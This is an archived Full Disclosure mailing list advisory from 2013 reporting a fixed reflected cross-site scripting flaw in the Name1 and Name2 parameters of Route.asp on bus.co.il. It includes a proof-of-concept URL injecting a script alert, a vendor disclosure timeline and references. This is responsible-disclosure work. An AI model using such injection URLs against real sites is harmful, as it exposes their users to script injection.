Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Bus.co.il - Route.asp Cross-site Scripting vulnerability

From: LIAD Mizrachi <liadmz () gmail com>
Date: Mon, 8 Jul 2013 16:29:15 +0300
Advisory: www.bus.co.il - Route.asp Cross-site Scripting vulnerability
Author: Liad Mizrachi
Vendor URL: http://www.bus.co.il
Vulnerability Status: Fixed

==========================
Vulnerability Description
==========================

'Name1' & 'Name2' - Parameters in "Route.asp" are prone to a XSS.


==========================
PoC
==========================

// IE 9 & FF 21.0

http://www.bus.co.il/otobusim/Front2007/Route.asp?RouteID=1&PlaceID1=196357&BuildingNumber1=0&PlaceID2=347360&BuildingNumber2=0&Name1=%3cscript%3ealert(%22XSS%22)%3c/script%3e&Name2=%D7%91%D7%AA+%D7%99%D7%9D+-+%D7%A1%D7%9E%D7%98%D7%AA+%D7%94%D7%A8%D7%90%D7%A9%D7%95%D7%A0%D7%99%D7%9D&StartPlaceID1=639500&EndPlaceID1=619400&DepTime1=17:02&ArrTime1=17:25&TravelID1=380437889&LineID1=4563409&LineCompanyID1=1010&BeforeWalkTime1=0:01&AfterWalkTime=5.17572916666653E-03&LanguageID=&Design=2007


==========================
Solution
==========================

fixed by vendor (verified)


==========================
Disclosure Timeline
==========================

24-June-2013 - vendor informed by mail
27-June-2013 - fixed by the vendor


==========================
References
==========================
http://www.bus.co.il/
http://picturepush.com/public/13422462
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: